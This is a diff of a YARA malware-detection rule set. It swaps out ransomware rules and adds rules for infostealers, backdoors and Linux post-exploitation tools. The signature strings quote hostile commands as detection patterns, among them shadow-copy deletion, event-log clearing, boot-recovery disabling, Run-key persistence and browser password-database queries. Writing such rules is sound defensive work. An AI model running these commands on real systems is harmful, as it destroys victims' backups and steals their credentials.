- score = 75 - quality = 50 - tags = "" - - strings: - $a1 = "msg/m_chinese" wide ascii - $a2 = ".wnry" wide ascii - $a3 = "attrib +h" wide ascii - $b1 = "WNcry@2ol7" wide ascii - $b2 = "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" wide ascii - $b3 = "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" wide ascii - $b4 = "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" wide ascii - $b5 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" wide ascii - - condition: - all of ($a*) or any of ($b*) -} -rule BINARYALERT_Ransomware_Windows_Cerber_Evasion -{ - meta: - description = "Cerber Ransomware: Evades detection by machine learning applications" - author = "@fusionrace" - id = "6e2f44a9-bc0f-5071-9d80-ddfb778cfe5d" - date = "2017-08-11" - modified = "2017-08-11" - reference = "http://www.darkreading.com/vulnerabilities---threats/cerber-ransomware-now-evades-machine-learning/d/d-id/1328506" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_cerber_evasion.yara#L1-L15" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "bc62b557d48f3501c383f25d014f22df" - logic_hash = "43b3b8be5a23b57f6c671abd8491cdc51af1cf3a3fe8a7be308150697cdb92ea" - score = 75 - quality = 80 - tags = "" + Description = "Attempts to detect SilentTrinity delivery documents" + Author = "Adam M. Swanda" strings: - $s1 = "38oDr5.vbs" fullword ascii wide - $s2 = "8ivq.dll" fullword ascii wide - $s3 = "jmsctls_progress32" fullword ascii wide + $s0 = "VBE7.DLL" fullword ascii + $s1 = "TargetPivotTable" fullword ascii + $s2 = "DocumentUserPassword" fullword wide + $s3 = "DocumentOwnerPassword" fullword wide + $s4 = "Scripting.FileSystemObject" fullword wide + $s5 = "MSXML2.ServerXMLHTTP" fullword wide + $s6 = "Win32_ProcessStartup " fullword ascii + $s7 = "Step 3: Start looping through all worksheets" fullword ascii + $s8 = "Step 2: Start looping through all worksheets" fullword ascii + $s9 = "Stringer" fullword wide + $s10 = "-decode -f" fullword wide + $s11 = "2. Da biste pogledali dokument, molimo kliknite \"OMOGU" fullword wide condition: - all of them + uint16(0)==0xcfd0 and filesize <200KB and (8 of ($s*) or all of them ) } -rule BINARYALERT_Ransomware_Windows_Petya_Variant_3 +rule DEADBITS_APT34_PICKPOCKET : APT APT34 INFOSTEALER WINMALWARE FILE { meta: - description = "Petya Ransomware new variant June 2017 using ETERNALBLUE" - author = "@fusionrace" - id = "cbf06e62-abe8-54af-b4f4-624ba9233e4b" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_3.yara#L1-L13" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "71b6a493388e7d0b40c83ce903bc6b04" - logic_hash = "4f21b394eb2dd0ebf416b018f438934fdc89cb896701d95b593477fc19abfe48" + description = "Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018" + author = "Adam Swanda" + id = "71db5c74-4964-5c5e-a830-242bfd0a2158" + date = "2019-07-22" + modified = "2019-07-22" + reference = "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" + source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT34_PICKPOCKET.yara#L1-L30" + license_url = "N/A" + logic_hash = "7063cff3eb42c4468e01c9b214161cd306f7126f66650d99d43168730d1dc83a" score = 75 quality = 80 - tags = "" + tags = "APT, APT34, INFOSTEALER, WINMALWARE, FILE" strings: - $s1 = "wevtutil cl Setup & wevtutil cl System" fullword wide - $s2 = "fsutil usn deletejournal /D %c:" fullword wide + $s1 = "SELECT * FROM moz_logins;" ascii fullword + $s2 = "\\nss3.dll" ascii fullword + $s3 = "SELECT * FROM logins;" ascii fullword + $s4 = "| %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');" ascii fullword + $s5 = "\\Login Data" ascii fullword + $s6 = "%s\\Mozilla\\Firefox\\profiles.ini" ascii fullword + $s7 = "Login Data" ascii fullword + $s8 = "encryptedUsernamencryptedPasswor" ascii fullword + $s10 = "%s\\Mozilla\\Firefox\\%s" ascii fullword + $s11 = "encryptedUsername" ascii fullword + $s12 = "2013-12-06 14:53:30 27392118af4c38c5203a04b8013e1afdb1cebd0d" ascii fullword + $s13 = "27392118af4c38c5203a04b8013e1afdb1cebd0d" ascii + $s15 = "= 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0" ascii fullword + $s18 = "[*] FireFox :" fullword wide + $s19 = "[*] Chrome :" fullword wide + $s20 = "username_value" ascii fullword condition: - any of them + uint16(0)==0x5a4d and (8 of them or all of them ) } -rule BINARYALERT_Ransomware_Windows_Hydracrypt +rule DEADBITS_Redghost_Linux : POSTEXPLOITATION LINUXMALWARE { meta: - description = "HydraCrypt encrypts a victim’s files and appends the filenames with the extension “hydracrypt_ID_*" - author = "@fusionrace" - id = "9ebf205e-b6a9-55a3-b0c3-9b088790dc9a" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://securingtomorrow.mcafee.com/mcafee-labs/hydracrypt-variant-of-ransomware-distributed-by-angler-exploit-kit/" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_hydracrypt.yara#L1-L16" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "08b304d01220f9de63244b4666621bba" - logic_hash = "3ecb3e6c269f4145e60b0e7bb0e896120ceb2db2123f847bf4bdf5d4490467d5" + description = "No description has been set in the source file - DeadBits" + author = "Adam Swanda" + id = "f598e115-f821-5932-aa14-5254bf28092c" + date = "2019-08-07" + modified = "2019-08-08" + reference = "https://github.com/d4rk007/RedGhost/" + source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/RedGhost_Linux.yara#L1-L45" + license_url = "N/A" + logic_hash = "0b12a0eda0a3b65c3da787770afb010eb5cd36426d41c04aca862ae1b01ab770" score = 75 quality = 80 - tags = "" - - strings: - $u0 = "oTraining" fullword ascii wide - $u1 = "Stop Training" fullword ascii wide - $u2 = "Play \"sound.wav\"" fullword ascii wide - $u3 = "&Start Recording" fullword ascii wide - $u4 = "7About record" fullword ascii wide - - condition: - all of them -} -rule BINARYALERT_Ransomware_Windows_Petya_Variant_2 -{ - meta: - description = "Petya Ransomware new variant June 2017 using ETERNALBLUE" - author = "@fusionrace" - id = "6401fd7e-5ef7-58b5-b8d3-a63c70e8daa3" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_2.yara#L1-L17" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "71b6a493388e7d0b40c83ce903bc6b04" - logic_hash = "7e04ffd0423cd1288af5c045bb06930abb732c0ea059e329cafc05faecb4f982" - score = 75 - quality = 78 - tags = "" - - strings: - $s1 = "dllhost.dat" fullword wide - $s2 = "\\\\%ws\\admin$\\%ws" fullword wide - $s3 = "%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\"" fullword wide - $s4 = "\\\\.\\PhysicalDrive" fullword wide - $s5 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip." fullword wide - - condition: - 3 of them -} -rule BINARYALERT_Ransomware_Windows_Zcrypt -{ - meta: - description = "Zcrypt will encrypt data and append the .zcrypt extension to the filenames" - author = "@fusionrace" - id = "d79cd266-4e77-562c-975c-8bf72efe7242" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://blog.malwarebytes.com/threat-analysis/2016/06/zcrypt-ransomware/" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_zcrypt.yara#L1-L23" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "d1e75b274211a78d9c5d38c8ff2e1778" - logic_hash = "df4073363da162e69f29493b5bfb4cb3f3d342357335c13ba6a3ac868607cb25" - score = 75 - quality = 78 - tags = "" + tags = "POSTEXPLOITATION, LINUXMALWARE" + Author = "Adam M. Swanda" strings: - $u1 = "How to Buy Bitcoins" ascii wide - $u2 = "ALL YOUR PERSONAL FILES ARE ENCRYPTED" ascii wide - $u3 = "Click Here to Show Bitcoin Address" ascii wide - $u4 = "MyEncrypter2.pdb" fullword ascii wide - $g1 = ".p7b" fullword ascii wide - $g2 = ".p7c" fullword ascii wide - $g3 = ".pdd" fullword ascii wide - $g4 = ".pef" fullword ascii wide - $g5 = ".pem" fullword ascii wide - $g6 = "How to decrypt files.html" fullword ascii wide + $name = "[ R E D G H O S T - P O S T E X P L O I T - T O O L]" ascii + $feature0 = "Payloads" ascii + $feature1 = "SudoInject" ascii + $feature2 = "lsInject" ascii + $feature3 = "Crontab" ascii + $feature4 = "GetRoot" ascii + $feature5 = "Clearlogs" ascii + $feature6 = "MassinfoGrab" ascii + $feature7 = "CheckVM" ascii + $feature8 = "MemoryExec" ascii + $feature9 = "BanIP" ascii + $func0 = "checkVM(){" ascii + $func1 = "memoryexec(){" ascii + $func2 = "banip(){" ascii + $func3 = "linprivesc(){" ascii + $func4 = "dirty(){" ascii + $func5 = "Ocr(){" ascii + $func6 = "clearlog(){" ascii + $func7 = "conmethods(){" ascii + $func8 = "add2sys(){" ascii condition: - any of ($u*) or all of ($g*) + ( uint16be(0x0)==0x2321 and for any i in (0..64) : ( uint16be(i)==0x2f62 and uint8(i+2)==0x68)) and ($name or 5 of them ) } -/* - * YARA Rule Set - * Repository Name: DeadBits - * Repository: https://github.com/deadbits/yara-rules/ - * Retrieval Date: 2024-09-08 - * Git Commit: d002f7ecee23e09142a3ac3e79c84f71dda3f001 - * Number of Rules: 19 - * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance) - * - * - * LICENSE - * - * NO LICENSE SET - */ rule DEADBITS_Avemaria_Warzone : AVEMARIA WARZONE WINMALWARE INFOSTEALER FILE { meta: @@ -117432,6 +119414,100 @@ rule DEADBITS_Avemaria_Warzone : AVEMARIA WARZONE WINMALWARE INFOSTEALER FILE condition: ( uint16(0)==0x5a4d and filesize <400KB) and (5 of ($str*) or all of them ) } +rule DEADBITS_TA505_Flowerpippi : TA505 FINANCIAL BACKDOOR WINMALWARE FILE +{ + meta: + description = "No description has been set in the source file - DeadBits" + author = "Adam Swanda" + id = "1cfcb25e-1de9-53ac-b272-22792844a2d0" + date = "2019-07-18" + modified = "2019-07-22" + reference = "https://github.com/deadbits/yara-rules" + source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/TA505_FlowerPippi.yara#L1-L65" + license_url = "N/A" + logic_hash = "eb709915f67d7225b024da99bc84a21455f3b9d5fb4bc779bbdf6a4d3ab33489" + score = 75 + quality = 24 + tags = "TA505, FINANCIAL, BACKDOOR, WINMALWARE, FILE" + Author = "Adam M. Swanda" + + strings: + $pipi = "pipipipip" ascii fullword + $pdb0 = "Loader.pdb" ascii fullword + $str0 = "bot.php" ascii fullword + $str1 = "%.2X" ascii fullword + $str2 = "sd.bat" ascii fullword + $str3 = "open" ascii fullword + $str4 = "domain" ascii fullword + $str5 = "proxy" ascii fullword + $str6 = ".exe" ascii fullword + $str7 = "Can't launch EXE file" ascii fullword + $str8 = "Can't load file" ascii fullword + $str9 = ".dll" ascii fullword + $str10 = "Dll function not found" ascii fullword + $str11 = "Can't load Dll" ascii fullword + $str12 = "__start_session__" ascii fullword + $str13 = "__failed__" ascii fullword + $str14 = "RSDSG" ascii fullword + $str15 = "ProxyServer" ascii fullword + $str16 = ":Repeat" ascii fullword + $str17 = "del \"%s\"" ascii fullword + $str18 = "if exist \"%s\" goto Repeat" ascii fullword + $str19 = "rmdir \"%s" ascii fullword + $str20 = "del \"%s\"" ascii fullword + $str21 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" ascii fullword + $str22 = "ProxyEnable" ascii fullword + $str23 = ".00cfg" ascii fullword + $str24 = ".idata" ascii fullword + $api0 = "IsProcessorFeaturePresent" ascii fullword + $api1 = "IsDebuggerPresent" ascii fullword + $api2 = "HttpOpenRequestA" ascii fullword + $api3 = "InternetCrackUrlA" ascii fullword + $api4 = "InternetOpenW" ascii fullword + $api5 = "HttpSendRequestW" ascii fullword + $api6 = "InternetCloseHandle" ascii fullword + $api7 = "InternetConnectA" ascii fullword + $api8 = "InternetSetOptionW" ascii fullword + $api9 = "InternetReadFile" ascii fullword + $api10 = "WININET.dll" ascii fullword + $api11 = "URLDownloadToFileA" ascii fullword + + condition: + uint16(0)==0x5a4d and filesize <700KB and ((10 of ($str*) and $pipi) or (10 of ($str*) and $pdb0) or (10 of ($str*) and 5 of ($api*)) or ( all of them )) +} +rule DEADBITS_Dacls_Trojan_Linux +{ + meta: + description = "No description has been set in the source file - DeadBits" + author = "Adam Swanda" + id = "bb83ba2b-70a3-5a0f-9588-d93b7f07f67f" + date = "2020-01-07" + modified = "2020-01-07" + reference = "https://github.com/deadbits/yara-rules" + source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/Dacls_Linux.yara#L1-L32" + license_url = "N/A" + logic_hash = "752d7daf9178e4fa20f2ce781c6ff70f83758f01479696f0808e1588da9a3d78" + score = 75 + quality = 80 + tags = "" + Author = "Adam M. Swanda" + + strings: + $cls00 = "c_2910.cls" ascii fullword + $cls01 = "k_3872.cls" ascii fullword + $str00 = "{\"result\":\"ok\"}" ascii fullword + $str01 = "SCAN %s %d.%d.%d.%d %d" ascii fullword + $str02 = "/var/run/init.pid" ascii fullword + $str03 = "/flash/bin/mountd" ascii fullword + $str04 = "Name:" ascii fullword + $str05 = "Uid:" ascii fullword + $str06 = "Gid:" ascii fullword + $str08 = "PPid:" ascii fullword + $str09 = "session_id" ascii fullword + + condition: + uint32be(0x0)==0x7f454c46 and (( all of ($cls*)) or ( all of ($str*))) +} rule DEADBITS_Winnti_Linux : LINUXMALWARE FILE { meta: @@ -117476,314 +119552,118 @@ rule DEADBITS_Winnti_Linux : LINUXMALWARE FILE condition: uint16(0)==0x457f and 8 of them } -rule DEADBITS_KPOT_V2 : WINMALWARE INFOSTEALER FILE -{ - meta: - description = "No description has been set in the source file - DeadBits" - author = "Adam Swanda" - id = "19e8d261-c658-5d0d-a95c-43fcaf2942e2" - date = "2019-08-05" - modified = "2019-08-05" - reference = "https://github.com/deadbits/yara-rules" - source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/KPOT_v2.yara#L1-L33" - license_url = "N/A" - logic_hash = "dc8cce2ae3a427f771b19b4d0e027b653ff03a7bf816303460398987535c5351" - score = 75 - quality = 80 - tags = "WINMALWARE, INFOSTEALER, FILE" - Description = "Attempts to detect KPOT version 2 payloads" - Author = "Adam M. Swanda" - - strings: - $str01 = "%s: " ascii fullword - $str02 = " _%s_" ascii fullword - $str03 = "0|%S|%s|%s|%s" ascii fullword - $str04 = "%s | %02d/%04d | %s | %s | %s" ascii fullword - $str05 = "%s | %s | %s | %s | %s | %s | %s | %d | %s" ascii fullword - $str06 = "%s: %s | %02d/%04d | %s" ascii fullword - $str07 = "%s = %s" ascii fullword - $str08 = "password-check" ascii fullword - $conf_re1 = /(SMTP|POP3|IMAP)\sServer/ wide - $conf_re2 = /(SMTP|POP3|IMAP)\s(User|Password|Port)/ wide - $conf01 = "*.config" ascii wide fullword - $conf02 = "HTTP Server URL" ascii wide fullword - $conf03 = "%s: %d" ascii wide fullword - $conf04 = "%s\\Outlook.txt" ascii wide fullword - - condition: - uint16(0)==0x5a4d and all of ($str*) and all of ($conf_re*) and all of ($conf0*) -} -rule DEADBITS_Silenttrinity : FILE +rule DEADBITS_Jsworm : MALWARE FILE { meta: description = "No description has been set in the source file - DeadBits" author = "Adam Swanda" - id = "40f9174c-e9a5-5453-b5fa-6c01c46daffa" - date = "2019-07-19" - modified = "2019-07-19" - reference = "https://countercept.com/blog/hunting-for-silenttrinity/" - source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/SilentTrinity_Payload.yara#L1-L55" + id = "6d452d04-b475-5241-890c-68119a7a8691" + date = "2019-09-06" + modified = "2019-09-06" + reference = "https://github.com/deadbits/yara-rules/" + source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/JSWorm.yara#L1-L38" license_url = "N/A" - logic_hash = "7fd1775aadfccfdf141c0721f557e6c54b058ac17a59a8e4561dd62ab4a1eff3" + logic_hash = "99074e25ec15c5b25fa41bef19203f5ddc227acd51fadca1e2c3ece538b3da01" score = 75 quality = 78 - tags = "FILE" - Description = "Attempts to detect the SilentTrinity malware family" - Author = "Adam M. Swanda" - - strings: - $pdb01 = "SILENTTRINITY.pdb" ascii - $str01 = "Found {0} in zip" ascii fullword - $str02 = "{0} not in zip file" ascii fullword - $str03 = "Invalid HMAC: {0}" ascii fullword - $str04 = "Attempting HTTP GET to {0}" ascii fullword - $str05 = "Downloaded {0} bytes" ascii fullword - $str06 = "Error downloading {0}: {1}" ascii fullword - $str07 = "Attempting HTTP POST to {0}" ascii fullword - $str08 = "POST" ascii fullword - $str09 = "application/octet-stream" ascii fullword - $str10 = "Error sending job results to {0}: {1}" ascii fullword - $str11 = ".dll" ascii fullword - $str12 = "Trying to resolve assemblies by staging zip" ascii fullword - $str13 = "'{0}' loaded" ascii fullword - $str14 = "Usage: SILENTTRINITY.exe []" ascii fullword - $str15 = "IronPython.dll" ascii fullword - $str16 = "IronPythonDLL" ascii fullword - $str17 = "DEBUG" ascii fullword - $str18 = "Main.py" ascii fullword - $str19 = "Execute" ascii fullword - $str20 = "SILENTTRINITY.Properties.Resources" ascii fullword - $str21 = ".zip" ascii fullword - $a00 = "HttpGet" ascii fullword - $a01 = "System.Net" ascii fullword - $a02 = "Target" ascii fullword - $a03 = "WebClient" ascii fullword - $a04 = "get_Current" ascii fullword - $a05 = "Endpoint" ascii fullword - $a06 = "AesDecrypt" ascii fullword - $a07 = "AesEncrypt" ascii fullword - $a08 = "cert" ascii fullword - $a09 = "WebRequest" ascii fullword - $a10 = "HttpPost" ascii fullword - - condition: - uint16(0)==0x5a4d and ((8 of ($str*) or ( all of ($a*) and $pdb01) or $pdb01)) -} -rule DEADBITS_Silenttrinity_Delivery_Document : FILE -{ - meta: - description = "No description has been set in the source file - DeadBits" - author = "Adam Swanda" - id = "be8cf8b7-d7f8-587d-b7bd-ad10796cda7c" - date = "2019-07-19" - modified = "2019-07-19" - reference = "https://countercept.com/blog/hunting-for-silenttrinity/" - source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/SilentTrinity_Delivery.yara#L1-L30" - license_url = "N/A" - logic_hash = "1efaa317dd250fa127b134ff8e6e6ac48d1056059256f790925d2315a6865033" - score = 75 - quality = 80 - tags = "FILE" - Description = "Attempts to detect SilentTrinity delivery documents" - Author = "Adam M. Swanda" + tags = "MALWARE, FILE" strings: - $s0 = "VBE7.DLL" fullword ascii - $s1 = "TargetPivotTable" fullword ascii - $s2 = "DocumentUserPassword" fullword wide - $s3 = "DocumentOwnerPassword" fullword wide - $s4 = "Scripting.FileSystemObject" fullword wide - $s5 = "MSXML2.ServerXMLHTTP" fullword wide - $s6 = "Win32_ProcessStartup " fullword ascii - $s7 = "Step 3: Start looping through all worksheets" fullword ascii - $s8 = "Step 2: Start looping through all worksheets" fullword ascii - $s9 = "Stringer" fullword wide - $s10 = "-decode -f" fullword wide - $s11 = "2. Da biste pogledali dokument, molimo kliknite \"OMOGU" fullword wide + $name00 = "JSWORM" nocase + $str00 = "DECRYPT.txt" nocase + $str02 = "cmd.exe" + $str03 = "/c reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\" + $str04 = /\/c taskkill.exe taskkill \/f \/im (store|sqlserver|dns|sqlwriter)\.exe/ + $str05 = "/c start C:\\ProgramData\\" + $str06 = "/c vssadmin.exe delete shadows /all /quiet" + $str07 = "/c bcdedit /set {default} bootstatuspolicy ignoreallfailures -y" + $str08 = "/c bcdedit /set {default} recoveryenabled No -y" + $str09 = "/c wbadmin delete catalog -quiet" + $str10 = "/c wmic shadowcopy delete -y" + $uniq00 = "fuckav" + $uniq01 = "DECRYPT.hta" nocase + $uniq02 = "Backup e-mail for contact :" + $uniq03 = "&2; ;;" ascii fullword + $str011 = "esac" ascii fullword + $str012 = "[ -x /usr/local/bin/update-notifier ] \\" ascii fullword + $str013 = " && exec /usr/local/bin/update-notifier" ascii fullword + $rcd01 = "/etc/rc2.d/S01update-notifier" ascii fullword + $rcd02 = "/etc/rc3.d/S01update-notifier" ascii fullword + $rcd03 = "/etc/rc5.d/S01update-notifier" ascii fullword condition: - ( uint16(0)==0x5a4d) and ((10 of ($str*) and 3 of ($cnc*)) or (3 of ($cnc*) and $pdb0)) + ( uint32be(0x0)==0x7f454c46) and (($ua_str and all of ($header*) and $initd and all of ($rcd*)) or ($ua_str and all of ($header*) and 10 of ($str*))) } -rule DEADBITS_Dacls_Trojan_Windows : FILE +rule DEADBITS_KPOT_V2 : WINMALWARE INFOSTEALER FILE { meta: description = "No description has been set in the source file - DeadBits" author = "Adam Swanda" - id = "424b2c0d-2373-5a72-9a97-52b4bfc5cdcf" - date = "2020-01-07" - modified = "2020-01-07" + id = "19e8d261-c658-5d0d-a95c-43fcaf2942e2" + date = "2019-08-05" + modified = "2019-08-05" reference = "https://github.com/deadbits/yara-rules" - source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/Dacls_Windows.yara#L1-L30" - license_url = "N/A" - logic_hash = "b77df7e3be9c264d6a63d40dbf49c41e9dd55b4e570c063b5710b849c36cc166" - score = 75 - quality = 80 - tags = "FILE" - Author = "Adam M. Swanda" - - strings: - $fext00 = ".exe" ascii wide - $fext01 = ".cmd" ascii wide - $fext02 = ".bat" ascii wide - $fext03 = ".com" ascii wide - $str00 = "Software\\mthjk" ascii wide - $str01 = "WindowsNT.dll" ascii fullword - $str02 = "GET %s HTTP/1.1" ascii fullword - $str03 = "content-length:" ascii fullword - $str04 = "Connection: keep-alive" ascii fullword - $cls00 = "c_2910.cls" ascii fullword - $cls01 = "k_3872.cls" ascii fullword - - condition: - ( uint16(0)==0x5a4d) and (( all of ($cls*)) or ( all of ($fext*) and all of ($str*))) -} -rule DEADBITS_APT34_PICKPOCKET : APT APT34 INFOSTEALER WINMALWARE FILE -{ - meta: - description = "Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018" - author = "Adam Swanda" - id = "71db5c74-4964-5c5e-a830-242bfd0a2158" - date = "2019-07-22" - modified = "2019-07-22" - reference = "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" - source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT34_PICKPOCKET.yara#L1-L30" + source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/KPOT_v2.yara#L1-L33" license_url = "N/A" - logic_hash = "7063cff3eb42c4468e01c9b214161cd306f7126f66650d99d43168730d1dc83a" + logic_hash = "dc8cce2ae3a427f771b19b4d0e027b653ff03a7bf816303460398987535c5351" score = 75 quality = 80 - tags = "APT, APT34, INFOSTEALER, WINMALWARE, FILE" - - strings: - $s1 = "SELECT * FROM moz_logins;" ascii fullword - $s2 = "\\nss3.dll" ascii fullword - $s3 = "SELECT * FROM logins;" ascii fullword - $s4 = "| %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');" ascii fullword - $s5 = "\\Login Data" ascii fullword - $s6 = "%s\\Mozilla\\Firefox\\profiles.ini" ascii fullword - $s7 = "Login Data" ascii fullword - $s8 = "encryptedUsernamencryptedPasswor" ascii fullword - $s10 = "%s\\Mozilla\\Firefox\\%s" ascii fullword - $s11 = "encryptedUsername" ascii fullword - $s12 = "2013-12-06 14:53:30 27392118af4c38c5203a04b8013e1afdb1cebd0d" ascii fullword - $s13 = "27392118af4c38c5203a04b8013e1afdb1cebd0d" ascii - $s15 = "= 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0" ascii fullword - $s18 = "[*] FireFox :" fullword wide - $s19 = "[*] Chrome :" fullword wide - $s20 = "username_value" ascii fullword - - condition: - uint16(0)==0x5a4d and (8 of them or all of them ) -} -rule DEADBITS_Godlua_Linux : LINUXMALWARE FILE -{ - meta: - description = "No description has been set in the source file - DeadBits" - author = "Adam Swanda" - id = "1a05c88a-8199-5c6d-9352-9ef60df40078" - date = "2019-07-18" - modified = "2019-07-22" - reference = "https://github.com/deadbits/yara-rules" - source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/godlua_linux.yara#L1-L57" - license_url = "N/A" - logic_hash = "70a8078f261648f050807e82009493e39fa32c0748576b3df76d8aaaa117103e" - score = 75 - quality = 51 - tags = "LINUXMALWARE, FILE" + tags = "WINMALWARE, INFOSTEALER, FILE" + Description = "Attempts to detect KPOT version 2 payloads" Author = "Adam M. Swanda" strings: - $tmp0 = "/tmp" ascii fullword - $tmp1 = "TMPDIR" ascii - $str1 = "\"description\": \"" ascii fullword - $str2 = "searchers" ascii fullword - $str3 = "/dev/misc/watchdog" ascii fullword - $str4 = "/dev/wdt" ascii fullword - $str5 = "/dev/misc/wdt" - $str6 = "lcurl.safe" ascii fullword - $str7 = "luachild" ascii fullword - $str8 = "cjson.safe" ascii fullword - $str9 = "HostUrl" ascii fullword - $str10 = "HostConnect" ascii fullword - $str11 = "LUABOX" ascii fullword - $str12 = "Infinity" ascii fullword - $str13 = "/bin/sh" ascii fullword - $str14 = /\.onion(\.)?/ ascii fullword - $str15 = "/etc/resolv.conf" ascii fullword - $str16 = "hosts:" ascii fullword - $resolvers = /([0-9]{1,3}\.){3}[0-9]{1,3}:53,([0-9]{1,3}\.){3}[0-9]{1,3},([0-9]{1,3}\.){3}[0-9]{1,3}:5353,([0-9]{1,3}\.){3}[0-9]{1,3}:443/ ascii - $identifier0 = "$LuaVersion: God " ascii - $identifier1 = /fbi\/d\.\/d.\/d/ ascii - $identifier2 = "Copyright (C) FBI Systems, 2012-2019, https://fbi.gov" fullword ascii - $identifier3 = "God 5.1" + $str01 = "%s: " ascii fullword + $str02 = " _%s_" ascii fullword + $str03 = "0|%S|%s|%s|%s" ascii fullword + $str04 = "%s | %02d/%04d | %s | %s | %s" ascii fullword + $str05 = "%s | %s | %s | %s | %s | %s | %s | %d | %s" ascii fullword + $str06 = "%s: %s | %02d/%04d | %s" ascii fullword + $str07 = "%s = %s" ascii fullword + $str08 = "password-check" ascii fullword + $conf_re1 = /(SMTP|POP3|IMAP)\sServer/ wide + $conf_re2 = /(SMTP|POP3|IMAP)\s(User|Password|Port)/ wide + $conf01 = "*.config" ascii wide fullword + $conf02 = "HTTP Server URL" ascii wide fullword + $conf03 = "%s: %d" ascii wide fullword + $conf04 = "%s\\Outlook.txt" ascii wide fullword condition: - uint16(0)==0x457f and ( all of them or ( any of ($identifier*) and $resolvers and any of ($tmp*) and 4 of ($str*)) or ( any of ($identifier*) and any of ($tmp*) and 4 of ($str*))) + uint16(0)==0x5a4d and all of ($str*) and all of ($conf_re*) and all of ($conf0*) } rule DEADBITS_APT34_VALUEVAULT : APT34 INFOSTEALER WINMALWARE FILE { @@ -117841,7 +119721,85 @@ rule DEADBITS_APT34_VALUEVAULT : APT34 INFOSTEALER WINMALWARE FILE $str30 = "main.init" ascii fullword condition: - uint16(0)==0x5a4d and ((10 of ($str*) and 3 of ($gopath*)) or ($fsociety and $powershell and $gobuild) or ($fsociety and 10 of ($str*))) + uint16(0)==0x5a4d and ((10 of ($str*) and 3 of ($gopath*)) or ($fsociety and $powershell and $gobuild) or ($fsociety and 10 of ($str*))) +} +rule DEADBITS_APT34_LONGWATCH : APT34 WINMALWARE KEYLOGGER FILE +{ + meta: + description = "No description has been set in the source file - DeadBits" + author = "Adam Swanda" + id = "74a6a408-2f0e-567d-8968-c304d258df81" + date = "2019-07-22" + modified = 